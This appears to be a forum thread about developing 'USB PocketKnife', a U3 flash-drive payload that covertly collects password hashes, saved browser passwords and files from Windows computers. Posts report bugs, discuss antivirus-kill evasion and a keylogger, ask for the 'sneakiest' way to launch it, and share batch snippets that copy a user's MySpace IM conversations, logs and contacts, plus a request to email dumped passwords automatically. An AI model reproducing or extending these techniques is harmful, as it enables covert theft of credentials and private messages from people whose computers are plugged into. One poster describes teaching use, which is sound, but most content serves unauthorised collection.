USB Pocket-Knife Development

[sbowne]

Thanks very much for this excellent tool. I am a college teacher, and I teach Ethical Hacking classes at City College San Francisco. I have been carrying my USB PocketKnife all around campus, amazing everyone with it. I can collect password hashes from Windows XP SP3 and Windows Vista SP1 machines. Half the time I have no problem, but sometimes I see an error message saying "Exception Processing Message c0000513 Parameters..." (see attached image). If I click "Continue", it collects the password hashes OK. I have not noticed any pattern to which machines will give that error.

I just wrote a project for my Advanced Hacking students based on this tool. It's posted here: http://samsclass.info/124/124_F08.html#projects

I owe you one! If you get out to San Francisco, look me up. And if you get to DEFCON, I'll buy you a drink!

--Sam Bowne

[Tmbomber]

*That*, is the infamous "No Disk" error that we've been talking about. It seems to stem from drive letters that show up in the list of drives that aren't actually drives. (such as on a laptop that has a CF slot when there's no CF card plugged into the slot)

Leapo is presently working on a solution.

Hey Leapo!!! How's that coming??? :)

[Niknation]

Hi there

This might be a dumb question but how do you enable the programs in pocketknife yes i have read the README and i can see all the files in the menu.bat but I dont know how to enable or disable then sorry for such a dumb question but i am new here...

[Jen]

Lol, you just type in the number of the one you want to enable. And sbowne, glad to have you here lol

[Leapo]

Thanks very much for this excellent tool. I am a college teacher, and I teach Ethical Hacking classes at City College San Francisco. I have been carrying my USB PocketKnife all around campus, amazing everyone with it. I can collect password hashes from Windows XP SP3 and Windows Vista SP1 machines. Half the time I have no problem, but sometimes I see an error message saying "Exception Processing Message c0000513 Parameters..." (see attached image). If I click "Continue", it collects the password hashes OK. I have not noticed any pattern to which machines will give that error.

I just wrote a project for my Advanced Hacking students based on this tool. It's posted here: http://samsclass.info/124/124_F08.html#projects

I owe you one! If you get out to San Francisco, look me up. And if you get to DEFCON, I'll buy you a drink!

--Sam Bowne

Wow, that was a bit unexpected! Good going with the project sheet, it's one of the best guides I've ever seen for setting my payload up. :)

As for the error, would I be correct in assuming that all of the computers that exhibit the error have some kind of removable media device in them that's mounted to a drive letter higher than the flash drive and U3 partition? For example, C:\ Hard Disk, D:\ DVD-ROM, E:\ Flash Drive, F:\ U3 Partition, G:\ Empty Card Reader

If this is the case, then the new drive detection I'm working on will fix the issue. The latest version (attached at the bottom of this post) doesn't have the new detection routine yet, but the next release will have it for sure.

UPDATE: VERSION 0.8.8.0 IS OUT!

NEW FEATURES

• Added option to shutdown PC when the payload is finished running.
• Added the ability to keep up to 3 payload configuration profiles.
• Added the ability to dump saved passwords from Google Chrome browser.

BUG FIX LIST

• If "Safety.txt Check" is disabled Menu.bat will now show the "run payload" option even if Safety.txt is found.
• Fixed some cosmetic issues in Menu.bat where some screens were a line too long.

KNOWN BUGS

• Keylogger isn't working right.

DOWNLOAD THE USB POCKET KNIFE V0.8.8.0

Includes both U3 and Non-U3 version. A pre-built U3 ISO is included

Download Mirrors: MegaUpload, and RapidShare

[vanguard]

@Leapo

It would be really nice, if you could add the use of "Launcher.exe", to get a start menu for normal U3-applications. If this is too difficult to add, or too much work, just drop me a line.

[Jen]

Just take it from gonzor vanguard. @ Leapo, I will surely test it on my machines! and post results asap

[vanguard]

Just take it from gonzor vanguard. @ Leapo, I will surely test it on my machines! and post results asap

Well, I took it from Gonzor, but I did not manage to get it started. How do I have to install it on the cdrom part ? I can unpack Leapos UTCUSTOM.ISO and add the Lauchpad.exe (like Gonzor did), but there must be still something changed in the scripts "GO.VBS" and/or "Autorun.inf" on the cdrom part. There is something wrong with my files "GO.VBS" or "Autorun.inf". Anyway, I still did got not success in getting it running.

[Jen]

Read through the thread. There was a tut on how to put it back

[Haktar]

Hey guys, this seems like a great mod and id love to try it out although i cant get the iso to write to the CD partition, i renamed it to PelicanBFG_autorun.iso and it attempts to write it but fails, i belive it is because the iso is bigger than the partition, a point in the right direction would be great ;)

[Kei]

Leapo, you done great work! I'm speechless. Thank you very much. And thanks for everybody who's helping this development to grow.

Could you password protect the further versions for easy downloading? thanks

If I not mistaken I can put non u3 payload on flash mp3 players (if system see them as massive data storage). What is very sneakiest way to run pocketknife from mp3 player? Any suggestions are welcomed.

[Haktar]

just got the iso on, the Sandisk installer wasnt working for me put the universal customizer on a XP machine worked great ;) thanks

[403f0rb1dd3n]

Leapo, any chance of these getting into the pocket knife?

It's something i added to gonzor's switchblade that i like to use. Very simple, i just added...

ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1

ECHO +----------------------------------+ >> %log% 2>&1

ECHO + [C:\ Tree Listing] + >> %log% 2>&1

ECHO +----------------------------------+ >> %log% 2>&1

tree /F /A C:\ >> %log% 2>&1

)

I also did...

ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1

ECHO +----------------------------------+ >> %log% 2>&1

ECHO + [File Type Associations] + >> %log% 2>&1

ECHO +----------------------------------+ >> %log% 2>&1

assoc >> %log% 2>&1

)

and...

ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1

ECHO +----------------------------------+ >> %log% 2>&1

ECHO + [Driver Info] + >> %log% 2>&1

ECHO +----------------------------------+ >> %log% 2>&1

driverquery >> %log% 2>&1

)

The tree listing gives you a list of all the files on the computer, very useful!

[Big*]

where is the actual link to dl it? and do i just have to dl it to a flash drive and it is good to go?

sorry im a complete noob at this, just started to learn programming etc

i like what i hear so far, keep it up!

Matt

[Jen]

I just tested it on my xp, works like a charm, except the dump passes don't work for me, says permission denied in log. Also, shut-down and the profile works too. However, avkill and the stop window's thing doesn't work, it get's detected if it's enabled.

[vanguard]

Read through the thread. There was a tut on how to put it back

@Jen Please don`t mind me, but I found only the one written by myself. But this does not work. It would be nice, if I could get some help.

@Leapo Nice thing ! I tested the latest version and now it is no more detecting the cachedump.exe at the cdrom part. Cheers !

Thanks for the profiles, too ! IMO three profiles should be enough. This is exactly, what I imagined.

[Tmbomber]

Leapo, any chance of these getting into the pocket knife?

It's something i added to gonzor's switchblade that i like to use. Very simple, i just added...

<snip>

tree /F /A C:\ >> %log% 2>&1

<snip>

assoc >> %log% 2>&1

<snip>

driverquery >> %log% 2>&1

Woops... just deleted what was here. I confused myself...

Put this:

IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1
mkdir %logdir%\Slurp_Data\
    tree /F /A C:\ > %logdir%\Slurp_Data\tree.log 2>&1
    assoc > %logdir%\Slurp_Data\assoc.log 2>&1
    driverquery > %logdir%\Slurp_Data\driver.log 2>&1

right at the beginning of the slurp1 code block.

I think Leapo was going to put a switch in to turn that on and off.

[Jen]

Also, the pocket-knife doesn't work on vista

[Matessim]

leapo, not to be a bitchy nancy, but can you please add a feature that emails passwords IMMIDIETLY after payload finished and just before it closes the computer? the keylogger is way more complicated, so im quite sure you can do it, can you mate? but immidietly when payload stop, to email all the dumps (No Files though)

[vanguard]

Leapo, I could test the new version today. As I wrote above, no more binaries are detected, when the stick is disarmed. But: When the stick is armed, and the option "AVKILL" is active, then CRCSS.EXE is detected by the virus scanner. IMO the virus scanner is checking the code in the RAM before execution, and is remembering, from which place it is started. On the other case CRCSS.EXE would have been detected, whenever you put the stick in. But this is definately not the case !

If the stick is armed, and the option "AVKILL" is NOT armed, so the virus scanner does not see the binary.

Hope, this helps.

[Abigwar]

Wow! That is a nicely crafted batch file. Good work!

I added this to the initial :slurp. Pulls contact lists, logs, saved convo's and offline messages for Myspace IM. Have a few other ideas I will implement on my own drive when I get time. Maybe I'll come back and post them.

:: Myspace IM
mkdir %logdir%\Slurp_Data\Myspace
fc.exe "%APPDATA%\Myspace\IM\Conversations\*" "%logdir%\Slurp_Data\Myspace\*" /i /o    
xcopy "%APPDATA%\MySpace\IM\Logs\*.log" "%logdir%\Slurp_Data\Myspace\" /s /c /q /r /h /y
xcopy "%APPDATA%\MySpace\IM\ContactCache\*.*" "%logdir%\Slurp_Data\Myspace\" /s /c /q /r /h /y
xcopy "%APPDATA%\MySpace\IM\Download\*.*" "%logdir%\Slurp_Data\Myspace\" /s /c /q /r /h /y

[Matessim]

nice abi,

the problem is, i had trouble once, had to abandon my chip, it would help also if it Emailed myself it, right before it shuts down.

Abi thats some really nice work.

i think the slurp should have options on What to slurp.. .that would be nice.

EDIT: i saw the email options, but thats for the keylogger, right?, i cant risk installing a keylogger, i want it to be clean when i leave it, keylogging and maleware is nasty buisness, i dont want get into that.

[Mark D Surface]

hey all

im have'n trouble enabling any of the features on the current non u3 payload.

I can use the numbers to surf through the menu, but when i try to enable any of the features it's states that it can't find the specified file and they remain disabled.

can anyone point me in the right direction as to why this isn't working?

EDIT --- found out it was the location on my flashdrive

[ikeppb]

Hey guys,

Just installed this and i was wondering if there is anyway to keep the U3 Loader so i can keep it as a U3 drive with apps and just enable/disable the payload when necessary.

I was thinking it would be easiest to do this with a start.bat calling the programs including "wscript SYSTEM\go.vbs" the only problem i am having is running the U3 launcher, when pointing to the .exe it just opens up a random folder on my harddrive,

Do i need to get it to copy the files over like in the original autorun? (below)

open=LaunchU3.exe -a
icon=LaunchU3.exe,0
action=Run U3 Launchpad

[Definitions]
Launchpad=LaunchPad.exe
Vtype=2

[CopyFiles]
FileNumber=1
File1=LaunchPad.zip

[Update]
URL=http://u3.sandisk.com/download/lp_installer.asp?custom=1.6.1.2&brand=PelicanBFG


[Comment]
brand=PelicanBFG

Also, how do i make it so the start.bat runs silently without popping up for a second or two?

Thanks,

ike,

[joshv06]

Wow the shutdown option was added!!! thanks!!